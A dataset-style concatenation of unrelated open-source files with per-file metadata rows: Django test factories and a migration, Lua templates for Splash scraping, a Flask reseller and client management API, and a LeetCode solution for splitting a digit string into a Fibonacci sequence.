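# the same (templates, stream, pads) arrays as scipy_normxcorr, so the
# frequency-domain backend can be swapped in wherever multichannel_xcorr is
# used, provided the compiled libutils library is available.
# ccc, used_chans = fftw_xcorr(templates.astype(np.float32),
#                              stream.astype(np.float32), pads=[0, 0])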
if __name__ == '__main__':
import doctest
doctest.testmod()
| lgpl-3.0 | -4,603,551,828,821,077,000 | 38.683168 | 79 | 0.618596 | false | 3.626055 | false | false | false |
jgirardet/unolog | tests/ordonnances/factory.py | 1 | 1288 | import factory
from ordonnances.models import Conseil, LigneOrdonnance, Medicament, Ordonnance
from tests.factories import FacBaseActe
fk = factory.Faker
class FacOrdonnance(FacBaseActe):
class Meta:
model = 'ordonnances.Ordonnance'
ordre = ""
# ligne = GenericRelation(LigneOrdonnance, related_query_name='medicament')
class FacLigneOrdonnance(factory.DjangoModelFactory):
ordonnance = factory.SubFactory(FacOrdonnance)
ald = fk('boolean')
class Meta:
abstract = True
@classmethod
def _create(cls, model_class, *args, **kwargs):
"""Override the default ``_create`` with our custom call."""
manager = cls._get_manager(model_class)
# The default would use ``manager.create(*args, **kwargs)``
return manager.new_ligne(**kwargs)
class FacMedicament(FacLigneOrdonnance):
class Meta:
model = Medicament
cip = fk('ean13', locale="fr_fr")
nom = fk('last_name', locale="fr_FR")
posologie = fk('text', max_nb_chars=50, locale="fr_FR")
duree = fk('pyint')
class FacConseil(FacLigneOrdonnance):
class Meta:
model = Conseil
texte = fk('text', max_nb_chars=200, locale="fr_FR")
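# Hypothetical usage sketch (assumed manager behaviour): because _create is
# overridden, building an instance routes through the model manager's
# new_ligne() helper instead of the default create(), e.g.
# medicament = FacMedicament()  # -> Medicament manager .new_ligne(...)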
| gpl-3.0 | 2,254,105,173,301,448,400 | 25.285714 | 81 | 0.677795 | false | 3.08134 | false | false | false |
postalXdude/PySplash | py_splash/static.py | 1 | 1346 | LUA_SOURCE = '''
function main(splash)
splash.resource_timeout = splash.args.timeout
{}
local condition = false
while not condition do
splash:wait(splash.args.wait)
condition = splash:evaljs({}{}{})
end
{}
{}
splash:runjs("window.close()")
{}
end
'''
GO = '\tassert(splash:go{}splash.args.url, baseurl=nil, headers={}, http_method="{}", body={}, formdata={}{})' \
.format(*['{}'] * 6)
JS_PIECE = '`{}`, document, null, XPathResult.BOOLEAN_TYPE, null).booleanValue || document.evaluate('
USER_AGENT = '\tsplash:set_user_agent(\'{}\')'
GET_HTML_ONLY = '\tlocal html = splash:html()'
RETURN_HTML_ONLY = '\treturn html'
GET_ALL_DATA = '''
local entries = splash:history()
local last_response = entries[#entries].response
local url = splash:url()
local headers = last_response.headers
local http_status = last_response.status
local cookies = splash:get_cookies()
'''
RETURN_ALL_DATA = '''
return {
url = splash:url(),
headers = last_response.headers,
http_status = last_response.status,
cookies = splash:get_cookies(),
html = splash:html(),
}
'''
PREPARE_COOKIES = '''
splash:init_cookies({}
{}
{})
'''
SET_PROXY = '''
splash:on_request(function(request)
request:set_proxy{}
{}
{}
end)
'''
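# Hypothetical illustration (not part of the original module): these constants
# are Lua/JS script fragments whose {} placeholders are filled in later via
# str.format before being substituted into LUA_SOURCE, e.g. roughly
# GO.format('{', "{['User-Agent']='ua'}", 'GET', 'nil', 'nil', '}')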
| mit | 7,171,708,248,713,019,000 | 19.089552 | 112 | 0.595097 | false | 3.220096 | false | false | false |
EdwardDesignWeb/grandeurmoscow | main/migrations/0005_auto_20170824_1135.py | 1 | 3162 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-08-24 11:35
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import main.models
class Migration(migrations.Migration):
dependencies = [
('main', '0004_auto_20170823_1229'),
]
operations = [
migrations.CreateModel(
name='Categories',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, verbose_name='\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438')),
],
options={
'verbose_name': '\u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u044f',
'verbose_name_plural': '\u0421\u043f\u0438\u0441\u043e\u043a \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0439',
},
),
migrations.CreateModel(
name='TypesRooms',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, verbose_name='\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u043c\u0435\u0449\u0435\u043d\u0438\u044f')),
],
options={
'verbose_name': '\u043f\u043e\u043c\u0435\u0449\u0435\u043d\u0438\u0435',
'verbose_name_plural': '\u0421\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043c\u0435\u0449\u0435\u043d\u0438\u0439',
},
),
migrations.AlterModelOptions(
name='photo',
options={'verbose_name': '\u0444\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u044e', 'verbose_name_plural': '\u0424\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0438 \u0442\u043e\u0432\u0430\u0440\u0430'},
),
migrations.AlterField(
model_name='photo',
name='image',
field=models.ImageField(upload_to=main.models.get_file_path, verbose_name='\u0424\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0438 \u0442\u043e\u0432\u0430\u0440\u0430'),
),
migrations.AddField(
model_name='categories',
name='room',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.TypesRooms'),
),
migrations.AddField(
model_name='items',
name='category',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='main.Categories', verbose_name='\u041a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u044f'),
preserve_default=False,
),
migrations.AddField(
model_name='items',
name='room',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='main.TypesRooms', verbose_name='\u041f\u043e\u043c\u0435\u0449\u0435\u043d\u0438\u0435'),
preserve_default=False,
),
]
| unlicense | -3,458,896,980,396,601,000 | 47.646154 | 225 | 0.622075 | false | 3.058027 | false | false | false |
inova-tecnologias/jenova | src/jenova/resources/reseller.py | 1 | 14834 | from flask_restful import abort, request
from datetime import datetime
import uuid
from jenova.resources.base import BaseResource, abort_if_obj_doesnt_exist
from jenova.models import (
Client, Reseller, Domain, User,
ClientSchema, ResellerSchema, DomainSchema, Service, ResellerServices
)
from jenova.components import Security
from jenova.components import db
class ResellerListResource(BaseResource):
def __init__(self):
filters = ['name']
super(ResellerListResource, self).__init__(filters)
def get(self):
self.parser.add_argument('limit', type=int, location='args')
self.parser.add_argument('offset', type=int, location='args')
reqdata = self.parser.parse_args()
offset, limit = reqdata.get('offset') or 0, reqdata.get('limit') or 25
resellers = Reseller.query\
.offset(offset)\
.limit(limit)\
.all()
if not resellers:
abort(404, message = 'Could not find any reseller')
return {
'response' : {
'resellers' : ResellerSchema(many=True).dump(resellers).data
}
}
class ResellerListByQueryResource(BaseResource):
def __init__(self):
filters = ['name']
super(ResellerListByQueryResource, self).__init__(filters)
def get(self, by_name_query):
self.parser.add_argument('limit', type=int, location='args')
self.parser.add_argument('offset', type=int, location='args')
reqdata = self.parser.parse_args()
offset, limit = reqdata.get('offset') or 0, reqdata.get('limit') or 100
if offset > limit or limit > 100:
abort(400, message = 'Wrong offset/limit specified. Max limit permited: 100')
total_records = Reseller.query\
.filter(Reseller.name.like('%' + by_name_query + '%'))\
.count()
if total_records == 0:
abort(404, message = 'Could not find any reseller using query: %s' % by_name_query)
resellers = Reseller.query\
.filter(Reseller.name.like('%' + by_name_query + '%'))\
.offset(offset)\
.limit(limit)\
.all()
response_headers = {}
if limit < total_records:
new_offset = limit + 1
new_limit = new_offset + (limit - offset)
response_headers['Location'] = '%s?offset=%s&limit=%s' % (request.base_url, new_offset, new_limit)
return {
'response' : {
'resellers' : ResellerSchema(many=True).dump(resellers).data
}
}, 200, response_headers
class ResellerServicesListResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ResellerServicesListResource, self).__init__(filters)
class ResellerDomainListResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ResellerDomainListResource, self).__init__(filters)
# def get(self, target_reseller):
# reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
def get(self, target_reseller):
self.parser.add_argument('limit', type=int, location='args')
self.parser.add_argument('offset', type=int, location='args')
reqdata = self.parser.parse_args()
offset, limit = reqdata.get('offset') or 0, reqdata.get('limit') or 25
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
count = Domain.query\
.filter(Reseller.id == Client.reseller_id)\
.filter(Domain.client_id == Client.id)\
.filter(Reseller.id == reseller.id)\
.count()
domains = Domain.query\
.filter(Reseller.id == Client.reseller_id)\
.filter(Domain.client_id == Client.id)\
.filter(Reseller.id == reseller.id)\
.offset(offset)\
.limit(limit)\
.all()
if not domains:
abort(404, message='Could not find any domains')
return {
'response' : {
'domains' : DomainSchema(many=True).dump(domains).data,
'total' : count
}
}
class ResellerResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ResellerResource, self).__init__(filters)
def get(self, target_reseller):
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
return {
'response' : {
'resellers' : ResellerSchema().dump(reseller).data
}
}
def delete(self, target_reseller):
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
if reseller.clients.all():
abort(409, message = 'The reseller still have clients')
db.session.delete(reseller)
db.session.commit()
return '', 204
def put(self, target_reseller):
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
self.parser.add_argument('email', type=str)
self.parser.add_argument('company', type=unicode)
self.parser.add_argument('phone', type=str)
self.parser.add_argument('enabled', type=bool)
self.parser.add_argument('services', type=str, action='append')
reqdata = self.parser.parse_args(strict=True)
reseller.email = reqdata.get('email') or reseller.email
reseller.company = reqdata.get('company') or reseller.company
reseller.phone = reqdata.get('phone') or reseller.phone
if reqdata.get('enabled') != None:
reseller.enabled = reqdata.get('enabled')
# Delete all services from the association proxy
del reseller.services[:]
for svc in reqdata.get('services') or []:
service = abort_if_obj_doesnt_exist('name', svc, Service)
reseller.services.append(service)
db.session.commit()
return '', 204
def post(self, target_reseller):
target_reseller = target_reseller.lower()
if Reseller.query.filter_by(name=target_reseller).first():
abort(409, message='The reseller {} already exists'.format(target_reseller))
# TODO: Validate email field
self.parser.add_argument('email', type=str, required=True)
self.parser.add_argument('company', type=unicode, required=True)
self.parser.add_argument('phone', type=str)
self.parser.add_argument('login_name', type=unicode, required=True)
self.parser.add_argument('login', type=str, required=True)
self.parser.add_argument('password', type=str, required=True)
self.parser.add_argument('services', type=str, action='append')
reqdata = self.parser.parse_args(strict=True)
reseller = Reseller(name = target_reseller,
email = reqdata['email'],
company = reqdata['company'],
)
reseller.phone = reqdata.get('phone')
# associate services to reseller
if reqdata.get('services'):
for service_name in set(reqdata['services']):
service = Service.query.filter_by(name = service_name).first()
if not service:
db.session.rollback()
          abort(404, message = 'Could not find service: %s' % service_name)
reseller_service = ResellerServices(
reseller = reseller,
service = service
)
db.session.add(reseller_service)
db.session.flush()
user = User(login = reqdata['login'],
name = reqdata['login_name'],
email = reqdata['email'],
password = Security.hash_password(reqdata['password']),
admin = True
)
reseller.user = user
db.session.add(reseller)
db.session.commit()
reseller = Reseller.query.filter_by(name=target_reseller).first()
return {
'response' : {
'reseller_id' : reseller.id,
'user_id' : user.id
}
}, 201
class ClientListResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ClientListResource, self).__init__(filters)
@property
def scope(self):
return 'client'
  # Overridden
def is_forbidden(self, **kwargs):
""" Check for access rules:
A global admin must not have any restrictions.
    Only an admin may access this resource.
    A requester may only access its own clients.
"""
target_reseller = kwargs.get('target_reseller')
if self.is_global_admin: return
if not self.is_admin and not request.method == 'GET':
abort(403, message = 'Permission denied! Does not have enough permissions for access this resource')
if not target_reseller:
abort(400, message = 'Could not find "target_reseller"')
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
if self.request_user_reseller_id != reseller.id:
abort(403, message = 'Permission denied! The reseller does not belongs to the requester.')
def get(self, **kwargs):
target_reseller = kwargs.get('target_reseller')
self.parser.add_argument('limit', type=int, location='args')
self.parser.add_argument('offset', type=int, location='args')
by_name_query = kwargs.get('by_name_query') or ''
reqdata = self.parser.parse_args()
offset, limit = reqdata.get('offset') or 0, reqdata.get('limit') or 25
if self.is_global_admin:
clients = Client.query \
.filter(Client.name.like('%' + by_name_query + '%') | Client.company.like('%' + by_name_query + '%'))\
.offset(offset)\
.limit(limit)\
.all()
return {
'response' : {
'reseller_id' : None,
'clients' : ClientSchema(many=True).dump(clients).data
}
}
elif self.is_admin:
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
if by_name_query:
clients = Client.query.join(Reseller, Client.reseller_id == Reseller.id) \
.filter(Reseller.name == target_reseller) \
.filter(Client.name.like('%' + by_name_query + '%') | Client.company.like('%' + by_name_query + '%'))\
.offset(offset)\
.limit(limit)\
.all()
else:
clients = Client.query.join(Reseller, Client.reseller_id == Reseller.id) \
.filter(Reseller.name == target_reseller) \
.offset(offset)\
.limit(limit)\
.all()
else:
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
      client = Client.query.filter_by(id = self.request_user_client_id).first()
      clients = [client] if client else []
if not clients:
abort(404, message = 'Could not find any clients')
return {
'response' : {
'reseller_id' : reseller.id,
'clients' : ClientSchema(many=True).dump(clients).data
}
}
class ClientResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ClientResource, self).__init__(filters)
@property
def scope(self):
return 'client'
  # Overridden
def is_forbidden(self, target_reseller, target_client):
""" Check for access rules:
A global admin must not have any restrictions.
    Only a requester admin may create and delete clients.
    A requester may only access its own clients.
"""
if self.is_global_admin: return
# Only admin can create and delete clients
if not self.is_admin and not request.method in ['GET', 'PUT']:
abort(403, message = 'Permission denied! Does not have enough permissions for access this resource')
if not target_reseller:
abort(400, message = 'Could not find "target_reseller"')
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
if self.request_user_reseller_id != reseller.id:
abort(403, message = 'Permission denied! The reseller does not belongs to the requester.')
def get(self, target_reseller, target_client):
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
client = abort_if_obj_doesnt_exist(self.filter_by, target_client, Client)
client_result = ClientSchema().dump(client)
return {
'response' : {
'client' : client_result.data
}
}
def delete(self, target_reseller, target_client):
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
client = abort_if_obj_doesnt_exist(self.filter_by, target_client, Client)
if client.domain.all():
abort(409, message = 'There are still domains associated with this client')
db.session.delete(client)
db.session.commit()
return '', 204
def put(self, target_reseller, target_client):
abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
client = abort_if_obj_doesnt_exist('name', target_client, Client)
# TODO: Validate email field
self.parser.add_argument('email', type=str)
self.parser.add_argument('phone', type=str)
self.parser.add_argument('company', type=str)
self.parser.add_argument('reseller_name', type=str)
reqdata = self.parser.parse_args()
# Check if the user belongs to the reseller
client.email = reqdata.get('email') or client.email
client.phone = reqdata.get('phone') or client.phone
client.company = reqdata.get('company') or client.company
if reqdata.get('reseller_name'):
if not self.is_global_admin:
abort(403, message = 'Permission denied! Does not have enough permissions.')
newreseller = Reseller.query.filter_by(name = reqdata.get('reseller_name')).first()
else:
newreseller = Reseller.query.filter_by(name = target_reseller).first()
client.reseller_id = newreseller.id
db.session.commit()
return '', 204
def post(self, target_reseller, target_client):
target_client = target_client.lower()
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
if Client.query.filter_by(name=target_client).first():
abort(409, message='The client {} already exists'.format(target_client))
#sleep(2)
# TODO: Validate email field
self.parser.add_argument('email', type=str, required=True, case_sensitive=True)
self.parser.add_argument('login_name', type=str)
self.parser.add_argument('login', type=str, case_sensitive=True)
self.parser.add_argument('password', type=str)
self.parser.add_argument('company', type=str, required=True)
self.parser.add_argument('enable_api', type=bool, default=False)
self.parser.add_argument('admin', type=bool, default=False)
reqdata = self.parser.parse_args()
# Check if the user belongs to the reseller
client = Client(
reseller_id = reseller.id,
name = target_client,
email = reqdata['email'],
company = reqdata['company']
)
if reqdata['login'] and reqdata['login_name'] and reqdata['password']:
user = User(login = reqdata['login'],
name = reqdata['login_name'],
email = reqdata['email'],
password = Security.hash_password(reqdata['password']),
api_enabled = reqdata['enable_api'],
admin = reqdata['admin']
)
client.user = [user]
db.session.add(client)
db.session.commit()
client = Client.query.filter_by(name=target_client).one()
return {
'response' : {
'client_id' : client.id
}
}, 201 | apache-2.0 | -3,406,313,545,690,063,400 | 34.154028 | 112 | 0.649656 | false | 3.429827 | false | false | false |
kingdaa/LC-python | lc/842_Split_Array_into_Fibonacci_Sequence.py | 1 | 2475 | # 842. Split Array into Fibonacci Sequence
# Difficulty: Medium
# Given a string S of digits, such as S = "123456579", we can split it into a
# Fibonacci-like sequence [123, 456, 579].
#
# Formally, a Fibonacci-like sequence is a list F of non-negative integers
# such that:
#
# 0 <= F[i] <= 2^31 - 1, (that is, each integer fits a 32-bit signed integer
# type);
# F.length >= 3;
# and F[i] + F[i+1] = F[i+2] for all 0 <= i < F.length - 2.
# Also, note that when splitting the string into pieces, each piece must not
# have extra leading zeroes, except if the piece is the number 0 itself.
#
# Return any Fibonacci-like sequence split from S, or return [] if it cannot
# be done.
#
# Example 1:
#
# Input: "123456579"
# Output: [123,456,579]
# Example 2:
#
# Input: "11235813"
# Output: [1,1,2,3,5,8,13]
# Example 3:
#
# Input: "112358130"
# Output: []
# Explanation: The task is impossible.
# Example 4:
#
# Input: "0123"
# Output: []
# Explanation: Leading zeroes are not allowed, so "01", "2", "3" is not valid.
# Example 5:
#
# Input: "1101111"
# Output: [110, 1, 111]
# Explanation: The output [11, 0, 11, 11] would also be accepted.
# Note:
#
# 1 <= S.length <= 200
# S contains only digits.
class Solution:
def splitIntoFibonacci(self, S):
"""
:type S: str
:rtype: List[int]
"""
INT_MAX = 2 ** 31 - 1
def dfs(S, index, path):
if index == len(S) and len(path) >= 3:
return True
for i in range(index, len(S)):
if S[index] == "0" and i > index:
break
num = int(S[index:i + 1])
if num > INT_MAX:
break
l = len(path)
if l >= 2 and num > path[l - 1] + path[l - 2]:
break
if len(path) < 2 or (
num == path[l - 1] + path[l - 2]):
path.append(num)
if dfs(S, i + 1, path):
return True
path.pop()
return False
res = []
dfs(S, 0, res)
return res
if __name__ == '__main__':
s1 = "123456579"
s2 = "11235813"
s3 = "112358130"
s4 = "0123"
s5 = "1101111"
sol = Solution()
print(sol.splitIntoFibonacci(s1))
print(sol.splitIntoFibonacci(s2))
print(sol.splitIntoFibonacci(s3))
print(sol.splitIntoFibonacci(s4))
print(sol.splitIntoFibonacci(s5))
| mit | 6,509,765,307,642,917,000 | 25.902174 | 78 | 0.532929 | false | 3.051788 | false | false | false |